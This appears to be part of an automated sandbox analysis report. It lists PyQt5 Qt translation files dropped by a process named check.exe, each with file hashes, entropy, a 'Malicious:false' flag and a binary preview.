                                                                                                                                                                                                                                      Preview:<.d....!..`...B.......*.......+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,...........*......i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y.....*.y.../.*.y..h..*.y.....*.T..J..*.0..'[.*.0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_tr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):110
                                                                                                                                                                                                                                      Entropy (8bit):3.630483009136986
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                                                      MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                                                      SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                                                      SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                                                      SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_uk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):4.021402900389864
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                                                      MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                                                      SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                                                      SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                                                      SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_zh_CN.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117347
                                                                                                                                                                                                                                      Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                                                      MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                                                      SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                                                      SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                                                      SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zhB..+....*.......+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`......*........................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_zh_TW.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):141
                                                                                                                                                                                                                                      Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                                                      MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                                                      SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                                                      SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                                                      SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_ar.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160017
                                                                                                                                                                                                                                      Entropy (8bit):5.35627970915292
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                                                      MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                                                      SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                                                      SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                                                      SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_bg.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165337
                                                                                                                                                                                                                                      Entropy (8bit):5.332219158085151
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                                                      MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                                                      SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                                                      SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                                                      SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bg_BGB../....*..,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O...........*...}..,............=...Q...m..,....t...|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_ca.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):210159
                                                                                                                                                                                                                                      Entropy (8bit):4.666388181115542
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                                                      MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                                                      SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                                                      SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                                                      SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_cs.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):174701
                                                                                                                                                                                                                                      Entropy (8bit):4.87192387061682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                                                      MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                                                      SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                                                      SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                                                      SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs_CZB..3p...*..F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9...............*...;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_da.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181387
                                                                                                                                                                                                                                      Entropy (8bit):4.755193800761075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                                                      MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                                                      SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                                                      SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                                                      SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......daB..4....*..h....+......@...f...A.......B.......C.......D...U...E.......F...v...G.......H.......I.......P.......Q.......R...6...S...Z...T...~...U.......V.......W..."...X...F...Y...j...]..+....s.......t..................-...;..+....;..,....;../....;..;....M..+....O.......O...r...........}..,............=...8...m..,0...t...c......T...(5..B...+;..NH..+;..~H..+O..,...1...UP..D@......E@......H4...E..HY..j...H.......IC...#..J....J..J.......J.......LD......L....1..PS...B..QR......R...o...T.......U.......X.......Zr......[`...W..\....}..]x...[.._....-.._.......yg...e..1...O....E..R....7..........-!......]............................$..k....[...7...,.......y...c...y.................j4...........9..l8...E..p............z...;..................%..a....D...~.............-.....L......OH.....Uz...5.......0.......0...U...0.......0..p....5...7...5..L$..............p... D..-... D..i...+....@..<U.....<U.....<....S..H5..-2..H5..j$..L....B..VE.. ...VE..P...V...*...f...e...f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_de.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):220467
                                                                                                                                                                                                                                      Entropy (8bit):4.626295310482312
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                                                      MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                                                      SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                                                      SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                                                      SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......de_DEB..7....*.......+..3....@..R....A..R....B..S....C..S@...D..S....E..T]...F..T....G..T....H..T....I..U#...P..W....Q..W6...R..W....S..W....T..W....U..W....V..XG...W..Xk...X..X....Y..X....]..2%...s..J$...t..9R......J.......B....;..1....;..3....;..q....;.......M..2O...O.......O..X@......ia...}..2y......Q....=..Q....m..2....t..Q...........(5......+;..ev..+;......+O..oh..1....4..D@..R...E@..WZ..H4..4...HY...[..H...AY..IC..>o..J...>...J.......J...>6..LD..@A..L...@...PS..I...QR..#...R....h..T...W...U...Xh..U....~..X...]...Zr..e(..[`..)...\...j...]x..O..._....K.._...lI..yg...U..1...f....E..i....7..........o.......wG......6.......6.......8....$...n...[..8....,..9....y.......y..=................3......>....9.......E..."......?_...z..#d.......0......A%...%..z....D..A.......B......KP......2.............^...5..B....0.......0..p....0..F....0...}...5..G....5..........H........... D..3}.. D...O..+...Q...<?..Ti..<U......<U..T...<...U)..H5..3...H5......L...X...VE..%j..V...l..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_en.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_es.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165170
                                                                                                                                                                                                                                      Entropy (8bit):4.679910767547088
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                                                      MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                                                      SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                                                      SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                                                      SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es_ESB../....*..*,...+...y...@.......A.......B.......C.......D...v...E...=...F.......G.......H.......I.......P.......Q... ...R...k...S.......T.......U.......V...1...W...U...X...y...Y.......]..+....s.......t...................c...;..+....;..,....;...%...;..#....;..-....M..+....O.......O...............}..,............=...]...m..,/...t..........A...(5..3...+;..<...+;..o...+O..!b..1...Ap..D@......E@...D..H4...-..HY..[F..H.......IC...%..J....L..J.......J.......LD......L....O..PS......QR..!...R...`K..T.......U....&..X.......Zr.....[`...h..\......]x...|.._....Y.._....A..yg......1...=....E..?a......!.......K........G...............R...$..\Q...[.......,...z...y.......y..................+............9..\....E..2............z.. ....................%..ON...D........................:......=B.....A....5...7...0.......0......0.."....0...,...0..3....5...}...5...Y..............a... D..-!.. D..Z6..+....0..<U...h..<U......<.......H5..-M..H5..Z...L.......VE.."...VE..>...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_fi.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):179941
                                                                                                                                                                                                                                      Entropy (8bit):4.720938209922096
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                                                      MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                                                      SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                                                      SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                                                      SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fiB..38...*..ct...+......@.......A.......B.......C...@...D.......E...]...F.......G.......H.......I...#...P.......Q...6...R.......S.......T.......U.......V...G...W...k...X.......Y.......]..*....s...T...t.......................;..*....;..+....;..&....;..3....M..+!...O.......O...e...........}..+K...........=.......m..+w...t..........J...(5..9...+;..:y..+;..mW..+O..$...1...KY..D@......E@...Z..H4...l..HY..X&..H.......IC......J.......J...."..J......LD.....L.......PS...'..QR.. L..R...]...T.......U.......X.......Zr......[`......\.......]x......_....k.._....>..yg.. /..1...;....E..>....7..{(......%.......J........T.......&.......U...$..Y[...[......,...s...y.......y...a.......}......d...........9..Y....E..k'...........z...........V..........%..M....D...Q.......{......d.....A......E......K....5.......0.......0..&J...0.......0..k....5...*...5..I9.............._:.. D..,O.. D..W...+....9..<U...G..<U...*..<.......H5..,y..H5..W...H5......L....5..VE..!u..VE..E...V..."{..f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_fr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):166167
                                                                                                                                                                                                                                      Entropy (8bit):4.685212271435657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                                                      MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                                                      SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                                                      SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                                                      SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr_FRB../....*..-....+.......@.......A.......B.......C...?...D.......E...\...F.......G.......H.......I..."...P.......Q...5...R.......S.......T.......U.......V...F...W...j...X.......Y.......]..+....s...=...t.......................;..+....;..,....;.......;..$b...;.......M..,....O.......O...5...........}..,3...........=.......m..,]...t..........A...(5..5j..+;..<T..+;..o...+O.."+..1...B\..D@......E@...Y..H4...8..HY..[{..H.......IC......J.......J.......J.......LD...|..L.......PS...?..QR..!...R...`j..T.......U....[..X.......Zr.....[`...)..\......]x......_....7.._.......yg...i..1...=Q...E..?@......"Y......K............................$..\....[...^...,...'...y.......y...+.......o....../c.......Y...9..\....E..6(...........z..!................j...%..OC...D...+.......[......a.....;......>......B....5.......0.......0...m...0..#....0.......0..6....5.......5..................a... D..-Y.. D..Ze..+....]..<U...;..<U......<.......H5..-...H5..Z...L.......VE.."...VE..?...V......

